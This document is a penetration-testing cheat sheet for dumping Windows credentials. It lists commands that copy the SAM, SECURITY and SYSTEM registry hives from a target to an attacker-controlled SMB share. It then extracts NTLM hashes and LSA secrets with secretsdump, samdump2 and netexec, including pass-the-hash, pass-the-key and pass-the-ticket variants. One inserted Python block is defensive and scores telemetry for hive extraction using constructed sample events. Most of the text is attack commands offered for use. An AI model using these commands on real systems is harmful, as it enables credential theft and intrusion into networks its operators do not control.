PRIMARY CATEGORY → WINDOWS CREDENTIALS DUMPING

Theory

Target Information 🎯

  • SAM → Hashes LM and NTLM

  • SECURITY → LSA Secrets (Cached Credentials for Domain Accounts…)

Both files have to be extracted from the target.

However, since the sensitive data in these files is encrypted with the Bootkey/Syskey, a symmetric key stored in the SYSTEM registry hive, that hive has to be extracted as well in order to decrypt them.

This can be done in the following ways, depending on the state of the target system:


Exfiltration - Down Windows

OS File System

From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
From the Target
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
Copy-Item -Force -Path "C:\Windows\System32\Config\SAM", "C:\Windows\System32\Config\Security", "C:\Windows\System32\Config\SYSTEM" -Destination "X:"

Exfiltration - Live Windows

Windows Registry

Registry Hives

From the Attacker
smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
From the Target
net use X: \\<ATTACKER>\<SHARED_FOLDER> /USER:<USER> <PASSWORD>
reg save HKLM\sam X:\SAM
reg save HKLM\security X:\SECURITY
reg save HKLM\system X:\SYSTEM
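As an added example (not part of the original cheat sheet), the following Python scores process-creation telemetry for the hive extraction shown above: reg.exe saving SAM/SECURITY/SYSTEM and copies of the files under System32\Config, rated higher when the same host also takes SYSTEM, since that hive holds the bootkey needed to decrypt the other two. The event field names and the sample events are constructed; the remote reg.py path would need Remote Registry telemetry instead.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 style).
# Field names are hypothetical; real telemetry carries the same data under other names.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "cmdline": "reg save HKLM\\sam X:\\SAM"},
    {"host": "WS01", "user": "CORP\\jdoe", "cmdline": "reg save HKLM\\security X:\\SECURITY"},
    {"host": "WS01", "user": "CORP\\jdoe", "cmdline": "reg save HKLM\\system X:\\SYSTEM"},
    {"host": "WS02", "user": "CORP\\svc_backup",  # benign: not a credential hive
     "cmdline": "reg save HKLM\\SOFTWARE\\Contoso C:\\backup\\contoso.hiv"},
    {"host": "WS03", "user": "CORP\\asmith",
     "cmdline": 'Copy-Item -Force -Path "D:\\Windows\\System32\\Config\\SAM" -Destination "X:"'},
    {"host": "WS03", "user": "CORP\\asmith", "cmdline": "reg query HKLM\\SYSTEM\\Select"},  # read-only
]

# reg.exe writing one of the three hives to disk (reg save / reg export).
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(sam|security|system)\b',
    re.I,
)
# Any command line naming the on-disk hive files under System32\Config (offline copy case).
CONFIG_COPY = re.compile(r"\\Windows\\System32\\Config\\(SAM|SECURITY|SYSTEM)\b", re.I)


def hives_touched(cmdline: str) -> set:
    """Return the credential hives that a single command line saves or copies."""
    hits = {m.group(1).upper() for m in HIVE_SAVE.finditer(cmdline)}
    hits |= {m.group(1).upper() for m in CONFIG_COPY.finditer(cmdline)}
    return hits


def score_hosts(events) -> dict:
    """Aggregate per host. Taking SAM or SECURITY alone is suspicious; taking SYSTEM as well
    hands over the bootkey needed to decrypt them, so that combination is rated high."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= hives_touched(ev["cmdline"])
    verdicts = {}
    for host, hives in per_host.items():
        encrypted = hives & {"SAM", "SECURITY"}
        if encrypted and "SYSTEM" in hives:
            verdicts[host] = "high"    # everything secretsdump needs for offline parsing
        elif hives:
            verdicts[host] = "medium"  # partial extraction, or SYSTEM on its own
    return verdicts


if __name__ == "__main__":
    for host, level in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {level}")
```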

Exfiltration - Linux

Reg.py - Impacket

Start an SMB Server to receive the data

SMBServer.py

smbserver.py -smb2support <SHARE> $( pwd )

Export the Registry Hives of the Target

reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SAM' -o '\\<ATTACKER>\<SHARE>'
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SYSTEM' -o '\\<ATTACKER>\<SHARE>'
reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' save -keyName 'HKLM\SECURITY' -o '\\<ATTACKER>\<SHARE>'

  • Backup all of them at once

reg.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>' backup -o '\\<ATTACKER>\<SHARE>'

Secrets Dump

Once the above files are obtained, just proceed as follows to extract the data from them →

Secretsdump.py

Offline Dumping

First, all these Registry Hives must be extracted from the target

Then, these files are parsed locally as follows →

secretsdump.py -outputfile <FILE> -sam <SAM> -security <SECURITY> -system <SYSTEM> local

Remote Dumping

Plain Password

secretsdump.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWD>@<TARGET>'

Pass the Hash

secretsdump.py -hashes 'LM:NT' '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Pass the Key

secretsdump.py -aesKey '<KEY>' '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Pass the Ticket

export KRB5CCNAME=<CCACHE>
secretsdump.py -k -no-pass '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Samdump2

samdump2 <SYSTEM> <SAM>

samdump2 works only with SAM and SYSTEM; it cannot parse SECURITY, so LSA Secrets are out of its reach.

Netexec

SAM

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --local-auth --sam

Security (LSA Secrets)

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --local-auth --lsa